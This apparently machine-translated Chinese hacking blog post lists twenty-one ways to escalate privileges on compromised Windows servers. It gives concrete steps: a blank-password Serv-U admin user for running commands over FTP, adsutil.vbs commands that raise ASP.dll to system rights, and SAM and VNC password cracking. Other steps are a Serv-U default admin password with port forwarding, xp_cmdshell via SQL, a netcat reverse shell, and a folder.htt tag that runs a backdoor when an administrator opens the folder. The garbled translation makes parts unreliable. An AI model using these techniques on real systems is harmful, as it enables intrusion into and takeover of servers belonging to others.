Method for Improving ring permission by 21

Author: Hannah Article Source: http://blog.77169.com/more.asp? Name = atan19a and ID = 6866

The following is a summary of my claim. Many methods have not been tested or succeeded, but I did see that others have succeeded.

. I am not talented, except for the first method I studied, others are summed up by others' experience. Hope to help your friends!

1. Radmin connection method

The condition is that you have sufficient permissions and the other party does not even have the firewall. Encapsulate Radmin, run, open the Peer Port, and then Radmin

. I have never succeeded ., The port is opened to the other party.

2. PCAnywhere

C: \ Documents ents and Settings \ All Users \ Application Data \ symantec \ pcAnywhere \ His GIF is stored here

File, install pcAnywhere locally

3. Sam cracking

C: \ winnt \ system32 \ config \ under his Sam cracking

4. Su password acquisition

C: \ Documents ents and Settings \ All Users \ Start Menu \Program\

Reference: Serv-U, and then check the local properties. After you know the path, check whether you can jump
After entering, if you have the permission to modify servudaemon. ini and add a user, the password is blank.
[User = wekwen | 1]
Password =
Homedir = c :\
Timeout = 600
Maintenance = System
Access1 = C :\| rwamelcdp
Access1 = D :\| rwamelcdp
Access1 = f :\| rwamelcdp
Skeyvalues =
This user has the highest permission, and then we can go to quote site exec xxx over FTP to improve the permission.

5. c: \ winnt \ system32 \ inetsrv \ data \

Reference: This directory is also fully controlled by erveryone. All we need to do is upload the tool for permission escalation,

Then execute

6. Su overflow Elevation of Privilege

N many online tutorials are not described in detail.

7. Run csript

Reference: Run "cscript c: \ Inetpub \ adminscripts \ adsutil. vbs get w3svc/inprocessisapiapps ".

Privilege Escalation
Use this cscript c: \ Inetpub \ adminscripts \ adsutil. vbs get w3svc/inprocessisapiapps
View the privileged DLL file: idq. dll httpext. dll httpodbc. dll ssinc. dll msw3prt. dll
Then add ASP. DLL to the privileged family.
ASP. dll is stored in c: \ winnt \ system32 \ inetsrv \ ASP. dll (the locations of different hosts are not necessarily the same)
We now add cscript adsutil. vbs set/w3svc/inprocessisapiapps "C: \ winnt \ system32 \ idq. dll"

"C: \ winnt \ system32 \ inetsrv \ httpext. dll" "C: \ winnt \ system32 \ inetsrv \ httpodbc. dll"

"C: \ winnt \ system32 \ inetsrv \ ssinc. dll" "C: \ winnt \ system32 \ msw3prt. dll" "C: \ winnt \ System32

\ Inetsrv \ ASP. dll"
You can use cscript adsutil. vbs get/w3svc/inprocessisapiapps to check whether it is added.

8. Script elevation

C: \ Documents ents and Settings \ All Users \ Start Menu \ Program \ Start write bat, vbs

9. VNC

This is Xiaohua's article hoho.

By default, the VNC password is stored in hkcu \ Software \ orl \ winvnc3 \ Password

We can use vncx4

To crack it, vncx4 is easy to use, as long as you enter

C: \> vncx4-W

Then, input the hexadecimal data in sequence. If you do not have to input a carriage return, you can simply enter the hexadecimal data.

10. nc Privilege Escalation

Give the other party an NC, but only if you have enough operation permissions and then bounce it back to your computer. hoho OK.

11. Permission escalation in social engineering
It's easy to look at his support. Generally, after seeing the account, try to guess the password as much as possible. The user password may also be his QQ number.

Check the phone number Hoho as much as possible.

12. Empty IPC connection

If the other party is really an idiot, scan his IPC.

13. replacement service

Don't you need to say that? I personally feel quite complicated.

14. autorun. inf

Autorunw.xxx.exe this = added the read-only, system, and hidden attribute to which disk can be uploaded by yourself.

He does not run

15. desktop. ini and folder. htt

Reference: First of all, we create a local folder, the name is not important, enter it, right click in the blank space, select "Custom

Folder "(XP does not seem to work) is always down, by default. After that, you will see two more

Setting file holder and desktop. ini file (if you cannot see it, cancel "hiding the protected operating system file" first) and

Find the folder. htt file in the folder setting directory, open it in notepad, and add the following to any location:Code: <Object

Id = "Runit" width = 0 Height = 0 type = "application/X-oleobject" codebase = "your backdoor file name">

</Object> then you put your backdoor file in the folder setting directory and upload the directory together with desktop. ini to the other party.

In any directory, You can execute our backdoor as long as the administrator browses this directory.

16. Su overwrite Privilege Escalation

Install a local Su and overwrite your own servudaemon. ini file with the servudaemon. ini file downloaded from it.

Start Serv-U, so all the configurations above are exactly the same as those above.

17. Su forwarding Port

43958 is the local management port of Serv-U. Fpipe.exe upload the file and execute the command: fpipe-V-l 3333-R.

43958 127.0.0.1 means to map port 4444 to port 43958. Then you can install a Serv-U locally and create

Server, fill in the IP address of the other party, the account is localadministrator, the password is #1 @ $ AK #. 1 K; 0 @ P after the connection, you can manage his

Serv-U now

18. SQL account password Leakage

If you have enabled the MSSQL Server, you can use the SQL connector to add an administrator account.

ASP file), because MSSQL is the default system permission.

Reference: the recipient has not deleted the xp_mongoshell method: Use sqlexec.exe, and fill in the IP address of the recipient in the host column, user and pass

Enter your username and password. Select xp_cmdshell "% s" for format. Click Connect.

Enter the CMD command you want in the CMD column.

19. asp. dll

Reference: Because ASP. dll is stored in c: \ winnt \ system32 \ inetsrv \ ASP. dll (the locations of different hosts are not necessarily the same

)
We now add cscript adsutil. vbs set/w3svc/inprocessisapiapps "C: \ winnt \ system32 \ idq. dll"

"C: \ winnt \ system32 \ inetsrv \ httpext. dll" "C: \ winnt \ system32 \ inetsrv \ httpodbc. dll"

"C: \ winnt \ system32 \ inetsrv \ ssinc. dll" "C: \ winnt \ system32 \ msw3prt. dll" "C: \ winnt \ System32

\ Inetsrv \ ASP. dll"
Now, you can use cscript adsutil. vbs get/w3svc/inprocessisapiapps to check whether it is added.
Note: In the usage of get and set, one is to view the setting, and the other is to run the above

C: \ Inetpub \ adminscripts> under this directory.
If you are an administrator and your machine is used to escalate ASP to system permissions, the defense method is

ASP. dll T is a privileged family, that is, the set command is used to overwrite those just now.

20. Magic winmail

Is there a webshell reference: http://www.eviloctal.com/forum/read.php? Tid = 3587 here

21. DBO ......

In fact, there are a lot of ways to improve the permissions. Let's take a look at how we use Hoho to refresh the server!